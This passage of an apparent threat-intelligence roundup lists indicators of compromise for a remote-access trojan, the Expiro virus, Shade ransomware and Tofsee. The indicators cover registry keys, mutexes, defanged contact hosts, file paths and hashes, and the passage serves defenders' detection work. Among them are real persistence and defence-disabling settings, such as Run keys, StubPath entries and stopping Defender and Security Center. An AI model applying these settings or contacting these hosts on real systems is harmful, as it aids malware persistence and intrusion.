` | 2 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: MicroUpdate ` | 2 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER\\RUN \nValue Name: Policies ` | 2 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER\\RUN \nValue Name: Policies ` | 2 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\SYSTEM ` | 2 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER\\RUN ` | 2 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER\\RUN ` | 2 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\SYSTEM \nValue Name: DisableTaskMgr ` | 1 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\SECURITY CENTER \nValue Name: AntiVirusDisableNotify ` | 1 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WSCSVC \nValue Name: Start ` | 1 
\n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\SYSTEM \nValue Name: DisableRegistryTools ` | 1 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\ACTIVE SETUP\\INSTALLED COMPONENTS\\{1Q4U2W04-714Q-L506-NR3K-B4MJ85W6X717} ` | 1 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\ACTIVE SETUP\\INSTALLED COMPONENTS\\{1Q4U2W04-714Q-L506-NR3K-B4MJ85W6X717} \nValue Name: StubPath ` | 1 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\ACTIVE SETUP\\INSTALLED COMPONENTS\\{7F0I7VXB-063R-XLLO-731N-3EGO8NDEDVOR} ` | 1 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\ACTIVE SETUP\\INSTALLED COMPONENTS\\{7F0I7VXB-063R-XLLO-731N-3EGO8NDEDVOR} \nValue Name: StubPath ` | 1 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\ACTIVE SETUP\\INSTALLED COMPONENTS\\{6C5V5081-L886-C7EB-2J6N-054ATGC34D64} ` | 1 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\ACTIVE SETUP\\INSTALLED COMPONENTS\\{6C5V5081-L886-C7EB-2J6N-054ATGC34D64} \nValue Name: StubPath ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: System ` | 1 \n`<HKCU>\\SOFTWARE\\TGB61 ` | 1 \n`<HKCU>\\SOFTWARE\\TGB61 \nValue Name: FirstExecution ` | 1 \n`<HKCU>\\SOFTWARE\\TGB61 \nValue Name: NewIdentification ` | 1 \nMutexes | Occurrences \n---|--- \n`DC_MUTEX-F3XDA2D` | 5 \n`_x_X_BLOCKMOUSE_X_x_` | 4 \n`_x_X_PASSWORDLIST_X_x_` | 4 \n`_x_X_UPDATE_X_x_` | 4 \n`DCPERSFWBP` | 3 \n`***MUTEX***` | 2 \n`***MUTEX***_SAIR` | 2 \n`054ATGC34D64` | 1 \n`\\BaseNamedObjects\\054ATGC34D64_SAIR` | 1 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`193[.]161[.]193[.]99` | 2 \n`92[.]44[.]166[.]32` | 1 \n`81[.]214[.]120[.]214` | 1 \n`88[.]229[.]213[.]118` | 1 \n`176[.]219[.]165[.]9` | 1 \nDomain Names contacted by malware. 
Does not indicate maliciousness | Occurrences \n---|--- \n`hackroot00[.]ddns[.]net` | 1 \n`berkeaksoy-45595[.]portmap[.]host` | 1 \n`metin2ci[.]duckdns[.]org` | 1 \n`toxicwithahmet[.]duckdns[.]org` | 1 \n`denememusareis[.]duckdns[.]org` | 1 \n`blackhamdsnh[.]duckdns[.]org` | 1 \n`bluejeans067-51471[.]portmap[.]io` | 1 \nFiles and or directories created | Occurrences \n---|--- \n`%APPDATA%\\dclogs` | 5 \n`%TEMP%\\XX--XX--XX.txt` | 3 \n`%TEMP%\\UuU.uUu` | 3 \n`%TEMP%\\XxX.xXx` | 3 \n`%APPDATA%\\logs.dat` | 3 \n`%HOMEPATH%\\Documents\\MSDCSC` | 2 \n`%HOMEPATH%\\Documents\\MSDCSC\\msdcsc.exe` | 2 \n`%System32%\\MSDCSC\\msdcsc.exe` | 1 \n`%SystemRoot%\\SysWOW64\\MSDCSC` | 1 \n`%ProgramData%\\Microsoft\\Windows\\Start Menu\\MSDCSC` | 1 \n`%ProgramData%\\Microsoft\\Windows\\Start Menu\\MSDCSC\\msdcsc.exe` | 1 \n`\\dir` | 1 \n`\\dir\\install` | 1 \n`\\dir\\install\\install` | 1 \n`\\dir\\install\\install\\server.exe` | 1 \n`%SystemRoot%\\SysWOW64\\install` | 1 \n`%SystemRoot%\\SysWOW64\\install\\server.exe` | 1 \n`%SystemRoot%\\SysWOW64\\MSDCSC\\msdcsc.exe` | 1 \n`%HOMEPATH%` | 1 \n`%HOMEPATH%\\Desktop` | 1 \n`%HOMEPATH%\\Desktop\\Yeni klas\u00f6r` | 1 \n`%HOMEPATH%\\Desktop\\Yeni klas\u00f6r\\install` | 1 \n`%HOMEPATH%\\Desktop\\Yeni klas\u00f6r\\install\\server.exe` | 1 \n`%TEMP%\\YOUS2.DCP` | 1 \n`%TEMP%\\SDQWEQ.EXE` | 1 \n \n*See JSON for more IOCs\n\n#### File Hashes\n\n` 08c0ff2a95d50cd94b1f5f58b3af99091d27490f949c0d3c68dbc81dec5f9171 190b08b1337d404696b0c91f0442d31149080c97b7a6fe13cf879b1a4ead4c94 3f74c0ebf0701b6726ddb4fdc6ddb15610d0075691b02e9615c50e095359b6c2 4627deb7f9e82a06051ba5594b681756003b97c5a9fadec91ec4af3d9ac9ed72 54ade3e9aa6cc71cb769eb69a65110f5fa5cdac93cbf20b82609b996bfaf76ca 611d5155f8e505c20f5d1e2bb70b37b84d7de3458577d89cc32dc12f0351ec95 988e7312821405d692b5b5846be7ede45f0d8bd23c914385a737efa0400f2bad 9cb46d011f79a6db1c6baef5b9cae3020166a515dff284fcd6ea2fb51da1cf1d a5f9af2d94dd64d9c05e56d9560c386081823a69823d8609501f1506ab5d7a1a 
a919a95c83a233542e5da375487e6fabb1b81157c8f5bb372e12bebad910b170 e586a39a113c6c49b096ff19519e822f736d06c805a01eaed6adee2ab5a5836c f2ae8953fa9406d5f746ff92b94dfc1d0d09378f12372a71ef07c98f94167317 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAmp |  \nCloudlock | N/A \nCws |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWsa |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-1RvTbG3vMU8/XXwCQCoKxSI/AAAAAAAACng/MTOlBFK0lLoN88OC8_5CHB5fFPcez3LmgCLcBGAsYHQ/s1600/4627deb7f9e82a06051ba5594b681756003b97c5a9fadec91ec4af3d9ac9ed72_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-nfV5LcgmSsA/XXwCUZvSjMI/AAAAAAAACnk/h4Y0eOfoK3YUQNgJ7-QupZLinGf9LX53wCLcBGAsYHQ/s1600/4627deb7f9e82a06051ba5594b681756003b97c5a9fadec91ec4af3d9ac9ed72_tg.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Virus.Expiro-7153559-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WSCSVC \nValue Name: Start ` | 18 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WINDEFEND \nValue Name: Start ` | 18 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER \nValue Name: HideSCAHealth ` | 18 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WUAUSERV \nValue Name: Start ` | 18 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\CLR_OPTIMIZATION_V2.0.50727_32 \nValue Name: Type ` | 18 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\CLR_OPTIMIZATION_V2.0.50727_64 \nValue Name: Type ` | 18 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\CLR_OPTIMIZATION_V4.0.30319_32 \nValue Name: Type ` | 18 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\CLR_OPTIMIZATION_V4.0.30319_32 \nValue Name: Start ` | 18 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\CLR_OPTIMIZATION_V4.0.30319_64 \nValue Name: Type ` | 18 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\CLR_OPTIMIZATION_V4.0.30319_64 \nValue Name: Start ` | 18 
\n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\COMSYSAPP \nValue Name: Type ` | 18 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\COMSYSAPP \nValue Name: Start ` | 18 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\IDSVC \nValue Name: Type ` | 18 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\IDSVC \nValue Name: Start ` | 18 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\IEETWCOLLECTORSERVICE \nValue Name: Type ` | 18 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\IEETWCOLLECTORSERVICE \nValue Name: Start ` | 18 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\MOZILLAMAINTENANCE \nValue Name: Type ` | 18 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\MOZILLAMAINTENANCE \nValue Name: Start ` | 18 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\MSISERVER \nValue Name: Type ` | 18 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\MSISERVER \nValue Name: Start ` | 18 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\OSE \nValue Name: Type ` | 18 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\OSE \nValue Name: Start ` | 18 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\UI0DETECT \nValue Name: Type ` | 18 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\UI0DETECT \nValue Name: Start ` | 18 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\VDS \nValue Name: Type ` | 18 \nMutexes | Occurrences \n---|--- \n`gazavat-svc` | 18 \n`kkq-vx_mtx52` | 18 \n`kkq-vx_mtx53` | 18 \n`kkq-vx_mtx54` | 18 \n`kkq-vx_mtx55` | 18 \n`kkq-vx_mtx56` | 18 \n`kkq-vx_mtx57` | 18 \n`kkq-vx_mtx58` | 18 \n`kkq-vx_mtx59` | 18 \n`kkq-vx_mtx60` | 18 \n`kkq-vx_mtx61` | 18 \n`kkq-vx_mtx62` | 18 \n`kkq-vx_mtx63` | 18 \n`kkq-vx_mtx64` | 18 \n`kkq-vx_mtx65` | 18 \n`kkq-vx_mtx66` | 18 \n`kkq-vx_mtx67` | 18 \n`kkq-vx_mtx68` | 18 \n`kkq-vx_mtx69` | 18 \n`kkq-vx_mtx70` | 18 \n`kkq-vx_mtx71` | 18 \n`kkq-vx_mtx72` | 18 \n`kkq-vx_mtx73` | 18 \n`kkq-vx_mtx74` | 18 \n`kkq-vx_mtx75` | 18 \n \n*See JSON for more IOCs\n\nFiles and or directories created | Occurrences \n---|--- \n`\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\ckjgpiji.tmp` | 18 
\n`\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\klncjook.tmp` | 18 \n`\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C\\bglnccaf.tmp` | 18 \n`\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C\\mnclgkoo.tmp` | 18 \n`%CommonProgramFiles%\\Microsoft Shared\\MSInfo\\kcndgmlj.tmp` | 18 \n`%CommonProgramFiles%\\Microsoft Shared\\OFFICE14\\cgcganec.tmp` | 18 \n`%CommonProgramFiles%\\Microsoft Shared\\VSTO\\10.0\\pnpndocj.tmp` | 18 \n`%CommonProgramFiles%\\Microsoft Shared\\ink\\bafefhom.tmp` | 18 \n`%CommonProgramFiles%\\Microsoft Shared\\ink\\dnmejccm.tmp` | 18 \n`%CommonProgramFiles%\\Microsoft Shared\\ink\\ejlkpjei.tmp` | 18 \n`%CommonProgramFiles%\\Microsoft Shared\\ink\\fijffced.tmp` | 18 \n`%CommonProgramFiles%\\Microsoft Shared\\ink\\ghpbhbif.tmp` | 18 \n`%CommonProgramFiles%\\Microsoft Shared\\ink\\gkbpadmi.tmp` | 18 \n`%CommonProgramFiles%\\Microsoft Shared\\ink\\pnhochhl.tmp` | 18 \n`%ProgramFiles%\\DVD Maker\\jaemdheq.tmp` | 18 \n`%ProgramFiles%\\Internet Explorer\\geakanpm.tmp` | 18 \n`%SystemRoot%\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorsvw.exe` | 18 \n`%SystemRoot%\\Microsoft.NET\\Framework\\v2.0.50727\\mscorsvw.exe` | 18 \n`%System32%\\alg.exe` | 18 \n`%System32%\\dllhost.exe` | 18 \n`%System32%\\ieetwcollector.exe` | 18 \n`%System32%\\msdtc.exe` | 18 \n`%System32%\\msiexec.exe` | 18 \n`%System32%\\snmptrap.exe` | 18 \n`%System32%\\sppsvc.exe` | 18 \n \n*See JSON for more IOCs\n\n#### File Hashes\n\n` 042fc31aadb0e0a33f91c9513ed9110d0c181de5b49f22614eb15ca759aabc58 07964288aebc5a85af04a534b2e795ded8c270466edfe2938cb5a7aae95fedee 2868317804d6a32158c492563f8cf121b0e714d116046f66323d49f7ea441f96 32084017ad00fe6e0ab45a804904363e3526f383cc78d35df55f66937b96f8fd 45414708db6a99c7fb927fcbc84861e55255a85e1583eaf661ef6226a880c525 53fd6b9b925d4cf2b143f057f11fa15659dd8d3e560aafa54148e87082e0aae7 69907401f98b32f51c11cd53b5149b29f8c4ecab38e08ca76188739f57e00431 
6e3f1120e34aac4dea7bc87ce7a7185074841bc7077c2fa13a742f0ca53c81a3 6fa4177a1ee93669aa408db21de55d860d9792f6d544cf3510d4c121c95f5be0 749762f179e4c19d613a128150d3b82d1b0c138424ad3d436a77874a3392829e 79adb188cd80c713fabe4921a52f5e41a040e913e32b995d98ea90a94cbb5006 91a4c230b121564208cbb629ddb79df79651738b2abd59c426b32e4dc4022f1d a24c20594273edfc118ccce5b7e82081240e9f6a3323818f7ac17d990170471d a52fdbfecc6455806e30f138c43f02186f91daf5fb032e62efd68e697322542f b2aac39e286f2172baa62b16555191a60d6c1d25d63f73de51d80d60f263db32 c367dd19b06798008ed520730d0c7e05f28645d4565de62969a318275b9e6cff de601aa4336e1ae644b7dcee10e0748cea30d70907b7e899ae39b364b56e181f e62cf47c56c9858faf8a344e9b468293b48069c0f1d47034fea06409e9c26644 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAmp |  \nCloudlock | N/A \nCws |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWsa | N/A \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-GbmULkOD5rE/XXwCwOHW-hI/AAAAAAAACn0/kgnSoWDxdZYvZlf6mnE8XK-lL3GtIGmYACLcBGAsYHQ/s1600/79adb188cd80c713fabe4921a52f5e41a040e913e32b995d98ea90a94cbb5006_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-xpszCiDFf_s/XXwC0ljKDTI/AAAAAAAACn4/oo7v-GB5mbEZaO2l5ie7Jfx89sL1w9_6wCLcBGAsYHQ/s1600/79adb188cd80c713fabe4921a52f5e41a040e913e32b995d98ea90a94cbb5006_tg.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Ransomware.Shade-7158472-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\SYSTEM32\\CONFIGURATION \nValue Name: xi ` | 71 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: Client Server Runtime Subsystem ` | 71 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\SYSTEM32\\CONFIGURATION \nValue Name: xVersion ` | 71 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\SYSTEM32 ` | 71 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\SYSTEM32\\CONFIGURATION ` | 71 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\SYSTEM32\\CONFIGURATION 
\nValue Name: shst ` | 50 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\SYSTEM32\\CONFIGURATION \nValue Name: sh1 ` | 50 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\SYSTEM32\\CONFIGURATION \nValue Name: xstate ` | 50 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\SYSTEM32\\CONFIGURATION \nValue Name: xcnt ` | 50 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\SYSTEM32\\CONFIGURATION \nValue Name: xmode ` | 50 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\SYSTEM32\\CONFIGURATION \nValue Name: xpk ` | 50 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\WINDOWS ERROR REPORTING\\DEBUG \nValue Name: ExceptionRecord ` | 41 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER \nValue Name: CleanShutdown ` | 32 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\\{509D0DCA-5840-11E6-A51E-806E6F6E6963} \nValue Name: Generation ` | 32 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\ENUM\\PCIIDE\\IDECHANNEL\\4&A27250A&0&2 \nValue Name: CustomPropertyHwIdKey ` | 32 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\ENUM\\USB\\VID_46F4&PID_0001\\1-0000:00:1D.7-2 \nValue Name: CustomPropertyHwIdKey ` | 32 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\\{509D0DCA-5840-11E6-A51E-806E6F6E6963} \nValue Name: Data ` | 32 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\\{6DD1DC5F-5840-11E6-B80E-00501E3AE7B5} \nValue Name: Data ` | 31 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\\{6DD1DC5F-5840-11E6-B80E-00501E3AE7B5} \nValue Name: Generation ` | 31 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\\{3F37BA63-EF5C-11E4-BB8D-806E6F6E6963} \nValue Name: Data ` | 31 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\\{3F37BA63-EF5C-11E4-BB8D-806E6F6E6963} \nValue Name: Generation ` | 31 
\n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\\{3F37BA64-EF5C-11E4-BB8D-806E6F6E6963} \nValue Name: Data ` | 31 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\\{3F37BA64-EF5C-11E4-BB8D-806E6F6E6963} \nValue Name: Generation ` | 31 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\ENUM\\PCI\\VEN_1AF4&DEV_1001&SUBSYS_00021AF4&REV_00\\3&2411E6FE&2&18 \nValue Name: CustomPropertyHwIdKey ` | 31 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\SYSTEM32\\CONFIGURATION \nValue Name: shsnt ` | 31 \nMutexes | Occurrences \n---|--- \n`cversions.2.m` | 30 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`128[.]31[.]0[.]39` | 28 \n`193[.]23[.]244[.]244` | 26 \n`86[.]59[.]21[.]38` | 25 \n`131[.]188[.]40[.]189` | 24 \n`194[.]109[.]206[.]212` | 23 \n`154[.]35[.]32[.]5` | 22 \n`171[.]25[.]193[.]9` | 22 \n`76[.]73[.]17[.]194` | 20 \n`104[.]18[.]35[.]131` | 20 \n`208[.]83[.]223[.]34` | 18 \n`104[.]16[.]154[.]36` | 16 \n`104[.]16[.]155[.]36` | 15 \n`104[.]18[.]34[.]131` | 11 \n`51[.]68[.]204[.]139` | 3 \n`46[.]166[.]182[.]20` | 3 \n`148[.]251[.]51[.]66` | 3 \n`51[.]68[.]206[.]28` | 3 \n`145[.]239[.]66[.]236` | 2 \n`78[.]129[.]150[.]72` | 2 \n`144[.]76[.]57[.]165` | 2 \n`137[.]74[.]19[.]202` | 2 \n`37[.]157[.]254[.]113` | 2 \n`136[.]243[.]176[.]148` | 2 \n`69[.]30[.]219[.]82` | 2 \n`62[.]210[.]157[.]133` | 2 \n \n*See JSON for more IOCs\n\nDomain Names contacted by malware. 
Does not indicate maliciousness | Occurrences \n---|--- \n`whatismyipaddress[.]com` | 31 \n`opengraphprotocol[.]org` | 31 \n`wsrs[.]net` | 31 \n`whatsmyip[.]net` | 31 \n`cmsgear[.]com` | 31 \n`luminati[.]io` | 31 \n`redirme[.]com` | 31 \nFiles and or directories created | Occurrences \n---|--- \n`%ProgramData%\\Windows\\csrss.exe` | 71 \n`%APPDATA%\\Microsoft\\Templates\\LiveContent\\Managed\\Document Themes\\1033\\TM01859862[[fn=Urban Pop]].thmx` | 50 \n`%APPDATA%\\Microsoft\\Templates\\LiveContent\\Managed\\Document Themes\\1033\\TM01859865[[fn=Kilter]].thmx` | 50 \n`%APPDATA%\\Microsoft\\Templates\\LiveContent\\Managed\\Document Themes\\1033\\TM01859866[[fn=Macro]].thmx` | 50 \n`%APPDATA%\\Microsoft\\Templates\\LiveContent\\Managed\\Document Themes\\1033\\TM01859868[[fn=Thermal]].thmx` | 50 \n`%APPDATA%\\Microsoft\\Templates\\LiveContent\\Managed\\Document Themes\\1033\\TM01972873[[fn=Summer]].thmx` | 50 \n`%APPDATA%\\Microsoft\\Templates\\LiveContent\\Managed\\Document Themes\\1033\\TM02455519[[fn=Winter]].thmx` | 50 \n`%APPDATA%\\Microsoft\\Templates\\LiveContent\\Managed\\Document Themes\\1033\\TM02455596[[fn=Spring]].thmx` | 50 \n`%APPDATA%\\Microsoft\\Templates\\LiveContent\\Managed\\Document Themes\\1033\\TM02455610[[fn=Autumn]].thmx` | 50 \n`%APPDATA%\\Microsoft\\Templates\\LiveContent\\Managed\\Word Document Building Blocks\\1033\\TM01793058[[fn=Median]].dotx` | 50 \n`%APPDATA%\\Microsoft\\Templates\\LiveContent\\Managed\\Word Document Building Blocks\\1033\\TM01793060[[fn=Origin]].dotx` | 50 \n`%APPDATA%\\Microsoft\\Templates\\LiveContent\\Managed\\Word Document Building Blocks\\1033\\TM01793064[[fn=Equity]].dotx` | 50 \n`%APPDATA%\\Microsoft\\Templates\\LiveContent\\Managed\\Word Document Building Blocks\\1033\\TM01840907[[fn=Equations]].dotx` | 50 \n`%APPDATA%\\Microsoft\\Templates\\Normal.dotm` | 50 \n`%APPDATA%\\Microsoft\\UProof\\CUSTOM.DIC` | 50 \n`%APPDATA%\\Mozilla\\Firefox\\profiles.ini` | 50 \n`\\README1.txt` | 50 \n`\\README10.txt` | 50 
\n`\\README2.txt` | 50 \n`\\README3.txt` | 50 \n`\\README4.txt` | 50 \n`\\README5.txt` | 50 \n`\\README6.txt` | 50 \n`\\README7.txt` | 50 \n`\\README8.txt` | 50 \n \n*See JSON for more IOCs\n\n#### File Hashes\n\n` 00591b03aa2be7dc7e67fa04a5da57bb803a2b4bc008fd7df40feadb72d2f00d 00953fe490792ae76ab5a584513a0ab3c460bcaa4fbb08f88ea5f0a261c44eab 018f3383e5f17da7f673fcd53b624f3157bfce958d3defd546fc82baf26265c6 01b2c4dd09be08a0db5cd266c2b0f4ae01ab920c6647910de820eb9cf82d55d4 01dea6848c96188f53d6e90977326b3562a2fcc30bd84c3d0e67880d6d4b8c50 02146af20bcaec9dbf6f30071791e73c7fd4eac6657f3b9d3159a6f663764250 025207f8e1551eb8156dd759426d57b2cbb42ce7b65479f071b7ffe8d0d03479 02b34490a5a4688b754dbb9be6507330ae88dfbc911f5c09e9e9e7c7ef10f2c5 02bf9968e18495581c271d4110a7bbaaf3889043c93af10357cb10499c8950a7 0616e6bc594dea95fad720bc966573921d9f2ec92eddcf665975227776e07fd6 0644b301b6414d2fe97644ae926849252c7a33607f2288253e9e53c5afd5c476 067cc19af3565e37da3bc0189210ad87ad111faf2a4c845f01fca036e3da912b 068491e6b7b02d7fef9a4778862886565795765b28b3c8f72f0d7adebc0b0a47 06a02b8b9e4871d0e558818a259dc6b6fcd0789b3d6a0f1c35dfaf90a8fc33f6 072a786d43860a9b5c2d4b49c1228ba651fad80e812eccd3e698d0f7b1b3adae 0769d0046146bd19aa118706ac9a470575139f06479c2781b680b5d8b92cce05 093bc279dcf1d7ee9a194af8e1e323b9ebe94f8a59a6dbbed8e82ca552c4dcb2 09483603bc66291e19444d644a5627416fb09d097b2a5efac0755c957cf7aedd 0c244b7cf8841885f0fecb184610c80ff3b3f6015e86f50ce35023383396dbf2 0c703b45991e6b99d4d4155af6437c5e255d7e52af06a2c9a29a3391774e4ae7 0d35cc4470e1f4493c8a9919769a9069a7deae2ee6ced8bd8ef0040c934a57f9 0d7531dc6587e8d9f9e3eae58e803b4aafd6d35927e7d48cc0a730cdc98a89d0 0df9f6f2d26051ba29c79a61f46e482d0cd61bb20a699cc7937e2f52f4d20fca 0e1f57431d814b1383b0202f10cdc0e929bd17d7788dc04e5d99b5f60761484e 0e21c68614126c9afae8a7747af154fdd254def83795bdb4033cb5a50de80026 `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAmp |  \nCloudlock | N/A \nCws |  \nEmail Security |  \nNetwork Security |  
\nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWsa |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-NJODSS6tAm4/XXwDEdY-HuI/AAAAAAAACoE/DaPCb7CgxpAu4xFwsAKtY6jQhvRHnplfgCLcBGAsYHQ/s1600/018f3383e5f17da7f673fcd53b624f3157bfce958d3defd546fc82baf26265c6_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-b-XEJqyOt8s/XXwDbvGRqtI/AAAAAAAACoM/heOO8hopN5EWCvAOCdlUVdiQNu_S0UtywCLcBGAsYHQ/s1600/018f3383e5f17da7f673fcd53b624f3157bfce958d3defd546fc82baf26265c6_tg.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Packed.Tofsee-7150793-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKU>\\.DEFAULT\\CONTROL PANEL\\BUSES \nValue Name: Config3 ` | 18 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> ` | 18 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: Type ` | 18 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: Start ` | 18 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: ErrorControl ` | 18 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: DisplayName ` | 18 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: WOW64 ` | 18 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: ObjectName ` | 18 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: Description ` | 18 \n`<HKU>\\.DEFAULT\\CONTROL PANEL\\BUSES \nValue Name: Config0 ` | 18 